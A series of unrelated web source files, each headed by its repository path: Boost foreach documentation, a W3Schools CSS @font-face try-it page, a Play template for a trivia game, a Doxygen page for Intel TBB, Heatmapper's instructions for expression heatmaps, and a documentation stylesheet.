<span class="keyword">int</span> <span class="identifier">i</span> <span class="special">=</span> <span class="number">0</span><span class="special">;</span>
<span class="identifier">BOOST_FOREACH</span><span class="special">(</span> <span class="identifier">i</span><span class="special">,</span> <span class="identifier">deque_int</span> <span class="special">)</span>
<span class="special">{</span>
<span class="keyword">if</span><span class="special">(</span> <span class="identifier">i</span> <span class="special">==</span> <span class="number">0</span> <span class="special">)</span> <span class="keyword">return</span><span class="special">;</span>
<span class="keyword">if</span><span class="special">(</span> <span class="identifier">i</span> <span class="special">==</span> <span class="number">1</span> <span class="special">)</span> <span class="keyword">continue</span><span class="special">;</span>
<span class="keyword">if</span><span class="special">(</span> <span class="identifier">i</span> <span class="special">==</span> <span class="number">2</span> <span class="special">)</span> <span class="keyword">break</span><span class="special">;</span>
<span class="special">}</span>
</pre>
<p>
Iterate over a sequence by reference, and modify the underlying sequence:
</p>
<pre class="programlisting"><span class="keyword">short</span> <span class="identifier">array_short</span><span class="special">[]</span> <span class="special">=</span> <span class="special">{</span> <span class="number">1</span><span class="special">,</span> <span class="number">2</span><span class="special">,</span> <span class="number">3</span> <span class="special">};</span>
<span class="identifier">BOOST_FOREACH</span><span class="special">(</span> <span class="keyword">short</span> <span class="special">&</span> <span class="identifier">i</span><span class="special">,</span> <span class="identifier">array_short</span> <span class="special">)</span>
<span class="special">{</span>
<span class="special">++</span><span class="identifier">i</span><span class="special">;</span>
<span class="special">}</span>
<span class="comment">// array_short contains {2,3,4} here</span>
</pre>
<p>
Iterate over a vector of vectors with nested <code class="literal">BOOST_FOREACH</code>
loops. In this example, notice that braces around the loop body are not necessary:
</p>
<pre class="programlisting"><span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span><span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span><span class="keyword">int</span><span class="special">></span> <span class="special">></span> <span class="identifier">matrix_int</span><span class="special">;</span>
<span class="identifier">BOOST_FOREACH</span><span class="special">(</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span><span class="keyword">int</span><span class="special">></span> <span class="special">&</span> <span class="identifier">row</span><span class="special">,</span> <span class="identifier">matrix_int</span> <span class="special">)</span>
<span class="identifier">BOOST_FOREACH</span><span class="special">(</span> <span class="keyword">int</span> <span class="special">&</span> <span class="identifier">i</span><span class="special">,</span> <span class="identifier">row</span> <span class="special">)</span>
<span class="special">++</span><span class="identifier">i</span><span class="special">;</span>
</pre>
<p>
Iterate over an expression that returns a sequence by value (i.e. an rvalue):
</p>
<pre class="programlisting"><span class="keyword">extern</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">vector</span><span class="special"><</span><span class="keyword">float</span><span class="special">></span> <span class="identifier">get_vector_float</span><span class="special">();</span>
<span class="identifier">BOOST_FOREACH</span><span class="special">(</span> <span class="keyword">float</span> <span class="identifier">f</span><span class="special">,</span> <span class="identifier">get_vector_float</span><span class="special">()</span> <span class="special">)</span>
<span class="special">{</span>
<span class="comment">// Note: get_vector_float() will be called exactly once</span>
<span class="special">}</span>
</pre>
<p>
Iterate in reverse:
</p>
<pre class="programlisting"><span class="identifier">std</span><span class="special">::</span><span class="identifier">list</span><span class="special"><</span><span class="keyword">int</span><span class="special">></span> <span class="identifier">list_int</span><span class="special">(</span> <span class="comment">/*...*/</span> <span class="special">);</span>
<span class="identifier">BOOST_REVERSE_FOREACH</span><span class="special">(</span> <span class="keyword">int</span> <span class="identifier">i</span><span class="special">,</span> <span class="identifier">list_int</span> <span class="special">)</span>
<span class="special">{</span>
<span class="comment">// do something with i</span>
<span class="special">}</span>
</pre>
<p>
Iterating over rvalues doesn't work on some older compilers. Check the <a class="link" href="foreach/portability.html" title="Portability">Portability</a> section to see whether your
compiler supports this.
</p>
<a name="foreach.introduction.making__literal_boost_foreach__literal__prettier"></a><h3>
<a name="foreach.introduction.making__literal_boost_foreach__literal__prettier-heading"></a>
<a class="link" href="foreach.html#foreach.introduction.making__literal_boost_foreach__literal__prettier">Making
<code class="literal">BOOST_FOREACH</code> Prettier</a>
</h3>
<p>
People have complained about the name <code class="literal">BOOST_FOREACH</code>. It's
too long. <code class="computeroutput"><span class="identifier">ALL</span> <span class="identifier">CAPS</span></code>
can get tiresome to look at. That may be true, but <code class="literal">BOOST_FOREACH</code>
is merely following the <a href="http://www.boost.org/more/lib_guide.htm" target="_top">Boost
Naming Convention</a>. That doesn't mean you're stuck with it, though.
If you would like to use a different identifier (<code class="computeroutput"><span class="identifier">foreach</span></code>,
perhaps), you can simply do:
</p>
<pre class="programlisting"><span class="preprocessor">#define</span> <span class="identifier">foreach</span> <span class="identifier">BOOST_FOREACH</span>
<span class="preprocessor">#define</span> <span class="identifier">reverse_foreach</span> <span class="identifier">BOOST_REVERSE_FOREACH</span>
</pre>
<p>
Only do this if you are sure that the identifier you choose will not cause
name conflicts in your code.
</p>
<div class="note"><table border="0" summary="Note">
<tr>
<td rowspan="2" align="center" valign="top" width="25"><img alt="[Note]" src="../../doc/src/images/note.png"></td>
<th align="left">Note</th>
</tr>
<tr><td align="left" valign="top"><p>
Do not use <code class="computeroutput"><span class="preprocessor">#define</span> <span class="identifier">foreach</span><span class="special">(</span><span class="identifier">x</span><span class="special">,</span><span class="identifier">y</span><span class="special">)</span> <span class="identifier">BOOST_FOREACH</span><span class="special">(</span><span class="identifier">x</span><span class="special">,</span><span class="identifier">y</span><span class="special">)</span></code>. This
can be problematic if the arguments are macros themselves. This would result
in an additional expansion of these macros. Instead, use the form shown above.
</p></td></tr>
</table></div>
</div>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"><p><small>Last revised: July 05, 2011 at 15:25:52 GMT</small></p></td>
<td align="right"><div class="copyright-footer"></div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="boost/local_time/tz_database.html"><img src="../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="libraries.html"><img src="../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="index.html"><img src="../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="foreach/extensibility.html"><img src="../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/cssref/tryit2c15.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/cssref/tryit.asp?filename=trycss3_font-face_rule_bold by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:52:03 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.userAgent.match(/iPad/i) ) {
document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9");
}
}());
</script>
<link rel="stylesheet" href="../trycss.css">
<!--[if lt IE 8]>
<style>
.textareacontainer, .iframecontainer {width:48%;}
.textarea, .iframe {height:800px;}
#textareaCode, #iframeResult {height:700px;}
.menu img {display:none;}
</style>
<![endif]-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-3855518-1', 'auto');
ga('require', 'displayfeatures');
ga('send', 'pageview');
</script>
<script>
var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];
(function() {
var gads = document.createElement('script');
gads.async = true;
gads.type = 'text/javascript';
var useSSL = 'https:' == document.location.protocol;
gads.src = (useSSL ? 'https:' : 'http:') +
'//www.googletagservices.com/tag/js/gpt.js';
var node = document.getElementsByTagName('script')[0];
node.parentNode.insertBefore(gads, node);
})();
</script>
<script>
googletag.cmd.push(function() {
googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads());
googletag.pubads().setTargeting("content","trycss");
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});
</script>
<script type="text/javascript">
function submitTryit()
{
var t=document.getElementById("textareaCode").value;
t=t.replace(/=/gi,"w3equalsign");
var pos=t.search(/script/i)
while (pos>0)
{
t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6);
pos=t.search(/script/i);
}
if ( navigator.userAgent.match(/Safari/i) ) {
t=escape(t);
document.getElementById("bt").value="1";
}
document.getElementById("code").value=t;
document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random();
validateForm();
document.getElementById("iframeResult").contentWindow.name = "view";
document.getElementById("tryitform").submit();
}
function validateForm()
{
var code=document.getElementById("code").value;
if (code.length>8000)
{
document.getElementById("code").value="<h1>Error</h1>";
}
}
</script>
<style>
</style>
</head>
<body>
<div id="ads">
<div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;">
<div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;">
<!-- TryitLeaderboard -->
<div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); });
</script>
</div>
<div style="clear:both"></div>
</div>
</div>
</div>
<div class="container">
<div class="textareacontainer">
<div class="textarea">
<div class="headerText" style="width:auto;float:left;">Edit This Code:</div>
<div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result »</button></div>
<div class="textareawrapper">
<textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html>
<html>
<head>
<style>
@font-face {
font-family: myFirstFont;
src: url(sansation_light.woff);
}
@font-face {
font-family: myFirstFont;
src: url(sansation_bold.woff);
font-weight: bold;
}
div {
font-family: myFirstFont;
}
</style>
</head>
<body>
<div>With CSS3, websites can <b>finally</b> use fonts other than the pre-selected "web-safe" fonts.</div>
<p><b>Note:</b> Internet Explorer 8 and earlier, do not support the @font-face rule with the WOFF format (only support for EOT format).</p>
</body>
<!-- Mirrored from www.w3schools.com/cssref/tryit.asp?filename=trycss3_font-face_rule_bold by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:52:03 GMT -->
</html>
</textarea>
<form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/cssref/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();">
<input type="hidden" name="code" id="code" />
<input type="hidden" id="bt" name="bt" />
</form>
</div>
</div>
</div>
<div class="iframecontainer">
<div class="iframe">
<div class="headerText resultHeader">Result:</div>
<div class="iframewrapper">
<iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="trycss3_font-face_rule_bold.html"></iframe>
</div>
<div class="footerText">Try it Yourself - © <a href="../index.html">w3schools.com</a></div>
</div>
</div>
</div>
<script>submitTryit()</script>
</body>
</html> |
Trivial-web/app/views/juego.scala.html | Arquisoft/Trivial4a | @(pregunta: model.Pregunta,resp: Form[Application.Respuesta], acierto: String, fallo: String, quesos: Application.Queso)
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Trivial</title>
<link rel="stylesheet" type="text/css" href="@routes.Assets.at("stylesheets/bootstrap.min.css")">
<link rel="stylesheet" type="text/css" href="@routes.Assets.at("stylesheets/main.css")">
</head>
<body>
<h1>Bienvenido al Trivial</h1>
<h3>@pregunta.getPregunta()</h3>
<h2 style="color:green">@acierto</h2>
<h2 style="color:red">@fallo</h2>
<br>
<table align="left" border="2" cellpadding="2">
<tr>
@if(quesos.queso1) {
<td bgcolor="#8fbc8f">
Entertaiment
</td>
}
@if(quesos.queso2) {
<td bgcolor="#daa520">
Geography
</td>
}
</tr>
<tr>
@if(quesos.queso3) {
<td bgcolor="#adff2f">
History
</td>
}
@if(quesos.queso4) {
<td bgcolor="#7fffd4">
Math
</td>
}
</tr>
</table>
<table align="center" border="1" cellpadding="2">
@for(respuesta <- pregunta.getRespuestasCorrectas()) {
@helper.form(action=routes.Application.responder(respuesta)){
<tr>
<td>
@respuesta <button type="submit">Responder</button>
</td>
</tr>
}
}
@for(respuesta2 <- pregunta.getRespuestasIncorrectas()) {
@helper.form(action=routes.Application.responder(respuesta2)) {
<tr>
<<td>
@respuesta2 <button type="submit">Responder</button>
</td>
</tr>
}
}
</table>
<a href="@routes.Application.principal()">Volver</a>
</body>
</html>
|
doc/html/a00312.html | Soth1985/tbb | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.4"/>
<title>Member List</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<!-- end header part -->
<!-- Generated by Doxygen 1.8.4 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="modules.html"><span>Modules</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="a00233.html">tbb</a></li><li class="navelem"><a class="el" href="a00078.html">invalid_multiple_scheduling</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">tbb::invalid_multiple_scheduling Member List</div> </div>
</div><!--header-->
<div class="contents">
<p>This is the complete list of members for <a class="el" href="a00078.html">tbb::invalid_multiple_scheduling</a>, including all inherited members.</p>
<table class="directory">
<tr bgcolor="#f0f0f0" class="even"><td class="entry"><b>what</b>() const (defined in <a class="el" href="a00078.html">tbb::invalid_multiple_scheduling</a>)</td><td class="entry"><a class="el" href="a00078.html">tbb::invalid_multiple_scheduling</a></td><td class="entry"></td></tr>
</table></div><!-- contents -->
<hr>
<p></p>
Copyright © 2005-2014 Intel Corporation. All Rights Reserved.
<p></p>
Intel, Pentium, Intel Xeon, Itanium, Intel XScale and VTune are
registered trademarks or trademarks of Intel Corporation or its
subsidiaries in the United States and other countries.
<p></p>
* Other names and brands may be claimed as the property of others.
|
about/instructions/www/expression.html | sbabicki/heatmapper | <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<style>
td {padding:0.5em;}
.opt {
text-align: center;
}
.desc {
text-align: left;
width: 50%;
}
.desc_table {
text-align: left;
width: 70%;
}
</style>
</head>
<body>
<div class = "well">
The expression function within Heatmapper allows the user to view unclustered
expression data, such as that from transcriptomic (microarray or RNAseq),
proteomic or metabolomic experiments.
<h4>Accepted File Formats</h4>
<ul>
<li>Tab separated with extensions <em>.txt</em>, .<em>dat</em>, <em>.tsv</em>, or <em>.tab</em></li>
<li>First sheet of an Excel workbook with extension <em>.xlsx</em></li>
</ul>
<h4>Data Structure</h4>
<ul>
<li>The first (header) row is used to assign column names.</li>
<li>A column labeled UNIQID is required.</li>
<li>If a column labeled "NAME" exists (optional), it will be used to assign row names.</li>
<li>Any additional columns containing non-numeric data will be ignored.</li>
<li>Data values can be positive or negative numbers.</li>
</ul>
<h4>Range</h4>
<ul>
<li>First row: column names</li>
<li>NAME column: row names</li>
<li>Other Columns: any positive or negative number</li>
<li>Input data can have up to 2,500 rows and 300 columns</li>
</ul>
<h4>Example</h4>
Download an example input file <a href="examples/expression_example1.txt" target="_blank">here</a> (Example 1).
<br /><br />
Example layout (snippet, with tabs replaced by spaces to make the columns apparent):
<br />
<code style="white-space: pre;">
UNIQID NAME 1 1 1 2 2 2
Hs.9305 angiotensin receptor-like 1 0.533865724 2.667389535 1.98516763 4.832817262 3.590801314 3.309607441
Hs.181307 H3 histone, family 3A -0.942951315 -0.500171526 -0.705453196 -0.32191231 -0.14030858 -0.427467964
Hs.83484 SRY (sex determining region Y)-box 4 -3.418094026 -3.181358856 -3.276305367 -2.392780506 -1.740889988 -2.248737455
...</code>
<br />
<br />
Tab-delimited version:
<br />
<code style="white-space: pre;">
UNIQID NAME 1 1 1 2 2 2
Hs.9305 angiotensin receptor-like 1 0.533865724 2.667389535 1.98516763 4.832817262 3.590801314 3.309607441
Hs.181307 H3 histone, family 3A -0.942951315 -0.500171526 -0.705453196 -0.32191231 -0.14030858 -0.427467964
Hs.83484 SRY (sex determining region Y)-box 4 -3.418094026 -3.181358856 -3.276305367 -2.392780506 -1.740889988 -2.248737455
...</code>
<br />
<br />
In this example, because the 'NAME' column is present, it is used to assign row names
instead of the 'UNIQID' column. Since the column names are not unique, Heatmapper will
automatically modify them to create unique column names.
<br />
<br />
With the Import Existing Clusters option, one may also
upload existing clusters from a file in <a href='http://evolution.genetics.washington.edu/phylip/newicktree.html' target="_blank">Newick Tree Format</a>. The node names in the tree must match the label names in the data file and must not include blanks, colons, semicolons, parentheses, or square brackets.
The following are example cluster files for Example 1 (linked above): <a href="examples/expression_example1_column_clusters.txt" target="_blank">column_clusters</a> and <a href="examples/expression_example1_row_clusters.txt" target="_blank">row_clusters</a>
</div>
<div>
<h5>An example of expression functionality: data from the Ashley Lab <a href="http://ashleylab.stanford.edu/tools/tools-scripts.html">Heatmap Builder</a></h5>
<p>You may use the data file given above for this example.</p>
<br></br>
<p>Click on the Expression tab on the main header and select the Upload File radio button, followed by the Choose File button. Alternatively, you may choose the 'Example File' radio button. Note: details about the example may be viewed by clicking the Information Icon. The following plot is created.</p>
<br></br>
<center><img src="images/HME1.png" width="70%" height="70%"</body></img></center>
<br></br>
<p class="opt">The following menu shows the available options. Each option is reviewed below.</p>
<br></br>
<center><img src="images/HME2.png" width="40%" height="40%"</body></img></center>
<br></br>
<center><img src="images/HME3.png" width="50%" height="50%"</body></img>
<p class="desc"><strong>Scale Type:</strong> Select direction to scale values in. There are three options: 'Row', 'Column', 'None'. The <strong>Row</strong> option is the default, which scales values by data rows. The <strong>Column</strong> option scales values by columns, as shown on the plot.</p>
</center>
<br></br>
<center><img src="images/HME4.png" width="50%" height="50%"</body></img>
<p class="desc">The <strong>None</strong> scaling option does not scale the values, as seen on the plot.</p>
</center>
<br></br>
<center><img src="images/HME5.png" width="50%" height="50%"</body></img>
<p class="desc"><strong>Color Brightness:</strong> Adjust the brightness of the colors on the plot. The default value is 0. By increasing it, to '30' for example, the plot is brighter. Some regions are more easily distinguished.</p>
</center>
<br></br>
<center><img src="images/HME6.png" width="50%" height="50%"</body></img>
<p class="desc"><strong>Number of Shades:</strong> Change the number of colors to be used on the plot. A lower value, such as 3, would group the data into only 3 categories by color as seen in the plot, and a more general pattern is observed. A higher value would divide the data further by color and more detail would be seen.</p>
</center>
<br></br>
<center><img src="images/HME7.png" width="50%" height="50%"</body></img>
<p class="desc"><strong>Color:</strong> Change the colors to be used for the plot. The Low Color, Middle Color, and High Color color boxes can be used to adjust the gradient. For example, by selecting a yellow from the 'Low Color' palette and a purple from the 'Middle Color' pallete, data values now progress from yellow to purple, to red. With this option, the very low and very high values are more visibly distinguishable.</p>
</center>
<br></br>
<center><img src="images/HME11.png" width="50%" height="50%"</body></img>
<p class="desc">Another color scheme with light grey, dark grey, and red results in this plot. Now the high values are more distinguishable than all the rest.</p>
</center>
<br></br>
<center>
<p class="desc"><strong>Clustering Method:</strong> Choose the method to be used for computing hierarchical clustering. The data would be grouped by similar expression levels.</p>
<p class="desc"><strong>Average Linkage</strong> - The distance between two clusters is the mean distance between all objects of the clusters (the default option).</p>
<p class="desc"><strong>Centroid Linkage</strong> - The distance between two clusters is the distance between their centroid values, as shown in this plot.</p>
<p class="desc"><strong>Complete Linkage</strong> - The distance between two clusters is the largset distance between the objects of the clusters.</p>
<p class="desc"><strong>Single Linkage</strong> - The distance between two clusters is the smallest distance between an objects of one cluster and another object of the other cluster.</p>
<p class="desc"><strong>Import Existing Clusters</strong> - Upload existing clusters from a file in <a href='http://evolution.genetics.washington.edu/phylip/newicktree.html' target="_blank">Newick Tree Format</a>. The node names in the tree must match the label names in the data file and must not include blanks, colons, semicolons, parentheses, or square brackets. The following are example cluster files for Example 1: <a href="examples/expression_example1_column_clusters.txt" target="_blank">column_clusters</a> and <a href="examples/expression_example1_row_clusters.txt" target="_blank">row_clusters</a></p>
<p class="desc"><strong>None</strong> - No clustering method is applied to the data. No dendrogram is created (either by row/column). Also, the Distance Measurement Method option is no longer applicable.</p>
</center>
<br></br>
<center>
<p class="desc"><strong>Distance Measurement Method:</strong> Choose the method to be used for computing distance between rows and columns. The selected distance method is used by the selected clustering algorithm to compute distances.
<p class="desc"><strong>Eucledian</strong> - The distance is computed as the length of the line segment connecting two values.</p>
<p class="desc"><strong>Pearson</strong> - The distance is the absolute value of the Pearson correlation coefficient (between 0 and 1).</p>
<p class="desc"><strong>Kendall's Tau</strong> - The distance is the number of pairwise disagreements between two groups of values. The larger the distance, the more dissimillar the two clusters are.</p>
<p class="desc"><strong>Spearman Rank Correlation</strong> - The distance is measured as the strength of association between two ranked values/groups.</p>
<p class="desc"><strong>Manhattan</strong> - The distance is the sum of distances (along each dimension) between two values.</p>
</center>
<br></br>
<center><img src="images/HME8.png" width="50%" height="50%"</body></img>
<p class="desc"><strong>Apply Clustering to Rows/Columns:</strong> Cluster the data by rows, columns, or both by selecting/removing the appropriate tabs. The default option is 'Rows'. As with this example, row clustering would group the genes by similar expression patterns, while column clustering would group the samples with similar expression levels. Row and column clustering would do both. This plot shows Column clustering, with the default 'Average Linkage' clustering method and 'Eucledian' distance method (compare with the first image on this page, clustered by rows).</p>
</center>
<br></br>
<center><img src="images/HME9.png" width="50%" height="50%"</body></img>
<p class="desc"><strong>Show Dendrogram:</strong> Choose to display the row/column clustering on the plot. For exmaple, after applying the clustering to both 'Rows' and 'Columns', choosing to show both 'Rows' and 'Columns' dendrograms with display the clustering information for both rows and columns on the plot, as seen in the image.</p>
</center>
<br></br>
<p>There are two Download options that may be used to download the plot/data at any step during the experience. The <strong>Plot</strong> option will download the an image of the plot as seen on the webpage (as PNG, PDF, PNG, or TIFF). The <strong>Table</strong> option will download the raw data in table format (as TXT or CSV).</p>
<p class="opt">Further fine tuning may be performed with the <strong>Show Advanced Options</strong> tab. The seven available options are described below.</p>
<br></br>
<center><img src="images/HMArrow.png" width="40%" height="40%"</body></img>
<p></p>
</center>
<center><img src="images/HMEAdvanced.png" width="40%" height="40%"</body></img>
</center>
<br></br>
<center>
<p class="desc"><strong>Plot Width:</strong> By expanding the plot width, the size of the individual cells will increase horizontally. Similarly, by decreasing the width, the cells will be more compact.</p>
<p class="desc"><strong>Plot Heigth:</strong> By expanding the plot height, the size of the individual cells will increase vertically. Similarly, by decreasing the height, the cells will be more compact.</p>
</center>
<br></br>
<center><img src="images/HME10.png" width="50%" height="50%"</body></img>
<p class="desc"><strong>Preview Full Height:</strong> Expand the plot vertically (the cells will have a minimum height). This improves visualization. A portion of the plot is shown here.</p>
</center>
<br></br>
<center>
<p class="desc"><strong>Title:</strong> Name the plot.</p>
<p class="desc"><strong>X Axis Label:</strong> Name the x-axis.</p>
<p class="desc"><strong>Y Axis Label:</strong> Name the y-axis.</p>
</center>
<br></br>
<center>
<p class="desc"><strong>Missing Data Color:</strong> Choose a color to distinguish the cells that have no value (for example if a chip was damaged at particular pixels). For this example, since the 'Middle Color' of the plot is also set to black, changing the missing color to yellow would display the empty cells with yellow, in contrast to the red/green on the plot. This is also a good way to check that there is no missing data, as is the case for this exmaple.</p>
</center>
<br></br>
<center><img src="images/HME12.png" width="70%" height="70%"</body></img>
<p class="desc_table">To view a section of the plot in more detail click on the <strong>Interactive</strong> tab next to the 'Plot' tab. Click and drag a portion of the plot to zoom in (by clicking once more anywhere on the plot, it will zoom back out). Hovering over the plot will display specific cell information, as shown in the image.</p>
</center>
<br></br>
<center><img src="images/HME13.png" width="70%" height="70%"</body></img>
<p class="desc_table">To view the full Row Dendrogram click on the <strong>Row Dendrogram</strong> tab next to the 'Interactive' tab. This will display the clustering relationships by row (in this case by expression levels between genes). Note that the clustering must be applied to 'Rows' for a dendrogram to be computed.</p>
</center>
<br></br>
<center><img src="images/HME14.png" width="70%" height="70%"</body></img>
<p class="desc_table">To view the full Column Dendrogram click on the <strong>Column Dendrogram</strong> tab next to the 'Row Dendrogram' tab. This will display the clustering relationships by column (in this case by expression levels between samples). Note that the clustering must be applied to 'Columns' for a dendrogram to be computed.</p>
</center>
<br></br>
<center><img src="images/HME15.png" width="70%" height="70%"</body></img>
<p class="desc_table">The user may also view the data in Table format by clicking on the <strong>Table</strong> tab next to the 'Column Dendrogram' tab. This will display the expression values for all genes and samples.</p>
</center>
<br></br>
<center><img src="images/HME16.png" width="70%" height="70%"</body></img>
<p class="desc_table">The table is searchable, by the gene name/id, or expression value. The user may enter a search value in the main <strong>Search</strong> box above the table, or in a column specific search box directly below the table. For example, by entering the name 'cathepsin O' in the <strong>NAME</strong> search box, all sample values for 'cathepsin O' are retrieved.</p>
</center>
<br></br>
<center><img src="images/HME17.png" width="70%" height="70%"</body></img>
<p class="desc_table">The table is also sortable, with the arrows located next to each header. For example, by clicking once on the NAME arrow, the table is sorted alphabetically by gene name.</p>
</center>
<br></br><br></br>
</div>
</body>
</html>
|
wpi/docxmlrpcs.css | hexmode/wikipathways.org | /**
* CSS stylesheet for HTML documentation of xmlrpc methods.
* original style copied from XINS project (http://xins.sourceforge.net),
* from Ernst de Haan and Chris Gilbride
*
* @author Gaetano Giunta
* @version $Id: docxmlrpcs.css,v 1.1 2005/12/01 14:46:29 ggiunta Exp $
* @copyright (c) 2005 G. Giunta
**/
body {
font-family: sans-serif;
color: #000000;
background-color: #ffffff;
}
h1 {
font-family: serif;
color: #000000;
font-size: 150%;
text-align: left;
}
h2 {
font-family: serif;
color: #000000;
font-size: 120%;
text-align: left;
border-width: 1pt 0pt 0pt 0pt;
border-style: solid;
border-color: #8888dd;
}
h3 {
font-family: serif;
font-size: 110%
}
table tr td {
vertical-align: top;
}
table tr th {
vertical-align: top;
}
table.headerlinks {
width: 100%;
border-collapse: collapse;
}
table.headerlinks tr td {
padding: 2pt;
margin: 0pt;
font-variant: small-caps;
background-color: #ddddff;
border-width: 0pt 0pt 1pt 0pt;
border-style: solid;
border-color: #8888dd;
}
table.headerlinks tr td.prevnext {
text-align: right;
}
.footer {
margin-top: 16pt;
border-width: 1pt 0pt 0pt 0pt;
border-style: solid;
border-color: #8888dd;
font-size: 70%;
font-style: italic;
text-align: right;
}
table.metadata {
left: 0pt;
margin: 8pt 0pt 0pt 0pt;
border-collapse: collapse;
}
table.metadata tr td.key {
font-weight: bold;
padding: 0pt 4pt 0pt 0pt;
}
table.metadata tr td.value {
padding: 0pt;
}
table.parameters {
border: none;
background-color: #ddddff;
border-collapse: collapse;
table-layout: fixed;
table-layout: auto;
width: 100%;
}
table.parameters tr th {
color: #ffffff;
background-color: #8888dd;
border: solid 1px #8888dd;
padding: 2pt;
font-weight: bold;
}
table.parameters tr td {
border: solid 1px #8888dd;
padding: 2pt;
}
table.parameters tr td.value {
font-family: monospace;
font-size: 90%;
}
table.parameters tr td.name {
font-family: monospace;
font-size: 90%;
}
table.parameters tr td.required {
/* font-variant: small-caps; */
}
table.inputparameters {
border: none;
background-color: #ddddff;
border-collapse: collapse;
table-layout: auto;
width: 95%;
}
table.inputparameters tr th {
color: #ffffff;
background-color: #8888dd;
border: solid 1px #8888dd;
padding: 2pt;
font-weight: bold;
}
table.inputparameters tr td {
border: solid 1px #8888dd;
padding: 2pt;
}
table.inputparameters tr td.value {
font-family: monospace;
font-size: 90%;
}
table.inputparameters tr td.name {
font-family: monospace;
font-size: 90%;
}
table.inputparameters tr td.required {
/* font-variant: small-caps; */
}
table.outputparameters {
border: none;
background-color: #ddddff;
border-collapse: collapse;
table-layout: auto;
width: 95%;
}
table.outputparameters tr th {
color: #ffffff;
background-color: #8888dd;
border: solid 1px #8888dd;
padding: 2pt;
font-weight: bold;
}
table.outputparameters tr td {
border: solid 1px #8888dd;
padding: 2pt;
}
table.outputparameters tr td.value {
font-family: monospace;
font-size: 90%;
}
table.outputparameters tr td.name {
font-family: monospace;
font-size: 90%;
}
table.outputparameters tr td.required {
/* font-variant: small-caps; */
}
table.resultcodes {
border: none;
background-color: #ddddff;
border-collapse: collapse;
table-layout: auto;
width: 95%;
}
table.resultcodes tr th {
color: #ffffff;
background-color: #7777dd;
border: solid 1px #8888dd;
padding: 2pt;
font-weight: bold;
}
table.resultcodes tr td {
border: solid 1px #8888dd;
padding: 2pt;
}
table.resultcodes tr td.value {
font-family: monospace;
font-size: 90%;
}
table.resultcodes tr.default td.value {
font-style: italic;
}
table.resultcodes tr td.name {
font-family: monospace;
font-size: 90%;
}
table.resultcodes tr td.required {
/* font-variant: small-caps; */
}
table.element_details {
width: 100%;
border: none;
background-color: #ddddff;
border-collapse: collapse;
table-layout: auto;
width: 95%;
}
